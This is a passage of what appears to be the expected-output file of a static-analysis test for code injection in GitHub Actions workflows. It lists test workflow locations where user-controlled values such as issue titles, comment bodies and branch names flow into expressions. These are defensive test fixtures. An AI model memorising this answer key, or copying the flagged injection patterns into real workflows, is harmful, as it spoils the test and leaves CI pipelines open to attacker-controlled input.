'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
